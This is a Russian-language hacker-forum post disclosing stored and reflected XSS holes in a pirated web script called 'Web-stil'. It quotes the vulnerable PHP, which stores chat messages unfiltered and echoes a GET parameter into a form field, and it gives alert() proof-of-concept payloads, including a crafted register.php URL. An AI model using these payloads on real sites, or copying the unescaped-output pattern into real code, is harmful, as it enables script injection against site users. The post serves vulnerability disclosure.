Prev Предыдущее сообщение   Следующее сообщение Next
Старый 05.02.2011, 14:41   #1
Online
 
Аватар для Online
 
Регистрация: 31.01.2011
Сообщений: 10
Репутация: 10
По умолчанию Web-stil ("пиратская" копия)

Web-stil ("пиратская копия")
Version: 1.0 (нет данных)

Active XSS

Vuln file: chat.php(messlist.php)
Файл chat.php через <iframe> загружает результат messlist.php, а messlist.php в свое время берет сообщения из БД (в БД сообщение добавляется без фильтрации):
PHP код:
//chat.php
<iframe frameborder="0" width="100%" height="400" src="messlist.php" marginheight="2" marginwidth="2" scrolling="auto" allowtransparency="yes" name="chatmesslist" style="border:#000000 1px solid;"></iframe>

// 
PHP код:
//messlist.php
$res=mysql_query("select * from tb_chat order by id desc limit 20");
// 
Exploit:
Код:
Просто через форму добавляем сообщения с содержанием "<script>alert('XsS')</script>" и имеем активку..[/COLOR]

Passive XSS

Vuln file: register.php
PHP код:
//
<td width="250" align="left"><input type="text" size="25" maxlength="25" name="referer" value="<? echo limpiar($_GET["r"]); ?>" autocomplete="off" class="field" value="" tabindex="1" /></td>

//
Exploit:
Код:
http://[host]/[path]/register.php?r="><script>alert(111)</script>
Примеры
__________________
Чем больше ты имеешь, тем с большей жадностью стремишься к тому, чего у тебя нет. Война у тебя рождается из побед.
Online вне форума   Ответить с цитированием
 

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot